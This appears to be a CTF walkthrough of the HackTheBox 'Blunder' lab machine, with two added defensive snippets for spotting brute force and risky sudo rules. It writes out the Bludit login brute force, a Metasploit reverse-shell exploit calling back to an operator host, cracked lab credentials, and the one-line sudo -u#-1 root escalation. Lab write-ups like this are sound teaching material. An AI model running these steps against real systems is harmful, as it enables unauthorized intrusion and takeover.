Blunder HackTheBox Walkthrough
This is the Blunder HackTheBox machine walkthrough. In this walkthrough I will show you how I exploited this machine and got the root flag. Before starting, let's learn something about the Blunder machine. It is a Linux machine, rated easy by its maker, with the IP address 10.10.10.191.
Now I will show you the step-by-step procedure to get the root flag on the Blunder machine.
First of all, connect your PC to the VPN so that you can access the lab, and ping the IP 10.10.10.191 to confirm that you can reach the Blunder machine. I started by scanning the IP address 10.10.10.191 to get some hints on where to start. Nmap, a port scanner, gave the following results.
Scanning the Machine
$nmap -sC -sV -oN scan 10.10.10.191
Only two ports open?
Let's run a full port scan in case services are running on other ports that are not in nmap's top 1000.
The full port scan gave the same result.
$nmap -sC -sV -p- -oN full_scan 10.10.10.191
Tip: It is a good idea to perform a full port scan during CTF hunting or penetration testing, because there is a chance that some open ports do not fall under nmap's top 1000 ports.
Ports 21 and 80 are shown. An Apache2 web server is running on port 80. After some enumeration I found that the website is running Bludit CMS, version 3.9.2, as revealed by this URL: http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2
As usual, my next step was to search whether any exploit is available for this CMS. I googled "Bludit CMS 3.9.2 exploit" and found an appropriate link; for more details look up CVE-2019-17240. searchsploit also gives this result.
There is a Metasploit module for Bludit. After opening it in Metasploit I found that it requires a password, so we need a username and password to use this module.
msf5>show info exploit/linux/http/bludit_upload_images_exec
I left it there and moved on to find other information. I ran directory brute forcing with dirsearch and the wordlist directory-list-2.3-small.txt but didn't find any interesting file. A hint from the HTB forum mentioned a txt file, so I fuzzed for hidden text files in the URL.
$wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100
This found todo.txt. After reading the content at http://10.10.10.191/todo.txt it appears that fergus is a user. I added it to my notes and continued enumerating.
Tip: It is a good idea to take notes of every interesting finding as you go, because they sometimes show you the way to proceed further.
Now we have a username and we need a password. Let's build our own wordlist with cewl, a well-known wordlist generator.
Creating Custom Wordlist
$cewl -d 3 -m 5 -w custom_wordlist.txt http://10.10.10.191/
Modify the script at https://rastating.github.io/bludit-brute-force-mitigation-bypass/ as follows: set username to fergus, because we want to brute force the user fergus, and set fname to the name of the custom wordlist you created with the cewl command (custom_wordlist.txt in my case). Save it as poc.py and run it.
So we have the credentials fergus : RolandDeschain. It's time to exploit the machine and get a remote shell back to our PC.
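From the defender's side, the login brute force above is easy to spot in the web server log even though Bludit's own lockout was bypassed: the linked script rotates the X-Forwarded-For header, which Bludit trusts, but Apache's default combined LogFormat records the TCP peer in its first field, and that field does not change. The following detector is an added example, not code from the walkthrough or from Bludit; the log lines are constructed, and the login endpoint /admin/login is assumed to be the one the script posts to.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" LogFormat. The first field (%h) is the TCP peer address;
# a client-supplied X-Forwarded-For header does not alter it.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line; return None for unparseable input."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_login_bruteforce(lines, path="/admin/login", threshold=10, window_s=60):
    """Return {peer_ip: peak_count} for peers that POST to `path` at least
    `threshold` times inside any sliding window of `window_s` seconds."""
    recent = defaultdict(deque)   # peer ip -> timestamps of its recent POSTs
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:   # expire old hits
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


# Constructed sample log: one peer hitting the login form once per second
# (the shape a wordlist run produces), plus ordinary traffic from another host.
SAMPLE_LOG = [
    f'10.10.15.87 - - [01/Jul/2020:12:00:{i:02d} +0000] "POST /admin/login '
    f'HTTP/1.1" 200 512 "-" "python-requests/2.23.0"'
    for i in range(12)
] + [
    '10.10.14.5 - - [01/Jul/2020:12:00:05 +0000] "GET /todo.txt HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [01/Jul/2020:12:00:30 +0000] "POST /admin/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
```

Run over a real access.log, feed the file's lines to find_login_bruteforce; the thresholds are tuning knobs, and a peer well above them within a minute is a wordlist run, not a forgetful admin.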
We have two ways to get shell.
1. Either use metasploit module or
2. Manually upload a file to the website by logging in at http://10.10.10.191/admin/ with the creds fergus : RolandDeschain and intercepting with Burp Suite to modify the requests. For more info visit https://github.com/bludit/bludit/issues/1079.
I preferred the first, because it doesn't require much effort, and you know how lazy we are about doing things manually when an automated option exists. 🙂
Use the payload php/meterpreter_reverse_tcp instead of php/meterpreter/reverse_tcp if the latter fails to give you a proper meterpreter shell.
Getting User Shell
$ msfdb run
msf5 > search bludit
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.15.87
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
meterpreter > sysinfo
Alright, we have a meterpreter shell. I used the shell command to drop to a system shell and then upgraded it to a fully interactive Linux shell.
meterpreter > shell
$python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ export TERM=xterm-256color
So we are in the Blunder HTB machine. Let's grab the user flag. Inside the home directory two users, hugo and shaun, are present. The user flag is inside the hugo folder, but www-data doesn't have permission to read it; only hugo does. I tried su hugo in case hugo and fergus share the same password, but the login failed, presumably due to an incorrect password. To access the user flag we have to log in as hugo. After manual enumeration I found the file users.php inside the directory
and got hugo's password hash along with its salt.
Now we have to crack this hash. Hash identifier reported it as a
Identify Type of Hash
I tried to crack it with the rockyou.txt wordlist but couldn't, so I tried the https://cmd5.com/ site and it cracked the hash successfully. The password is Password120, so the credentials are hugo : Password120.
Switch user to hugo
Grab User Flag
Let's check what special permissions hugo has.
Tip: Whenever you get a shell, run sudo -l to check what special command [*] the current user can run, then google 'how to escalate privilege using [*] command'. You may get your answer easily. In this case, for example, google (ALL, !root) /bin/bash.
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
Googling (ALL, !root) /bin/bash gave our privilege escalation vector in the first link: a vulnerable version of sudo. See this link.
After reading the exploit PoC we can get a root shell in just one command. Let's do it.
Getting Root Shell
$sudo -u#-1 /bin/bash
Enter the password Password120.
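For anyone auditing their own hosts rather than a CTF box, the (ALL, !root) rule is the thing to look for: a runas list built on negation is only as strong as sudo's user-id parsing, which is exactly what the one-liner above abuses. The POSIX sh helper below is an added example, not part of the walkthrough; it flags negation-based runas specs in sudo -l or sudoers text and compares a sudo version string against 1.8.28, the release that started rejecting out-of-range numeric user ids (that boundary is from sudo's release history, not from this page). The sudo -l sample is constructed.

```sh
#!/bin/sh
# Added audit helper (not from the walkthrough). Two checks a defender can run
# before anyone tries `sudo -u#-1`:
#   1. find runas specs that rely on negation, e.g. "(ALL, !root)";
#   2. compare the installed sudo version against 1.8.28 (release boundary from
#      sudo's changelog, assumed here rather than stated on the page).

# Print every rule line whose runas list contains a "!user" entry.
# Exit status is grep's: 0 when at least one such rule exists, 1 otherwise.
find_negated_runas() {
    printf '%s\n' "$1" | grep -E '\([^)]*![^)]*\)'
}

# Return 0 when version string $1 (e.g. "1.8.21p2") is older than 1.8.28.
sudo_version_is_old() {
    v=${1%%p*}                       # drop the "pN" patch suffix
    maj=${v%%.*}
    rest=${v#*.}
    min=${rest%%.*}
    pat=${rest#*.}
    [ "$pat" = "$rest" ] && pat=0    # "1.9" style string with no third field
    num=$((maj * 1000000 + min * 1000 + pat))
    [ "$num" -lt 1008028 ]
}

# Constructed sample in the shape of `sudo -l` output, modelled on the rule
# seen on the box plus one ordinary allow rule.
SUDO_L_SAMPLE='User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
(root) NOPASSWD: /usr/bin/systemctl restart apache2'

find_negated_runas "$SUDO_L_SAMPLE" && echo "negation-based runas rule found; review it"
if sudo_version_is_old "1.8.21p2"; then
    echo "sudo 1.8.21p2 predates the fix for the -u#-1 bypass; patch it"
fi
```

On a live host, replace the sample with `"$(sudo -l 2>/dev/null)"` and the literal version with `"$(sudo -V | sed -n 's/^Sudo version //p')"`.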
Grab Root Flag
Grab the root flag from the root folder.
This is how I got root on the Blunder HackTheBox machine. I hope you learned something from my approach. If you have any issue or question, let me know at [email protected] or in the comment section. Thanks for reading this walkthrough.
For more HackTheBox walkthroughs, visit ethicalhacs.com.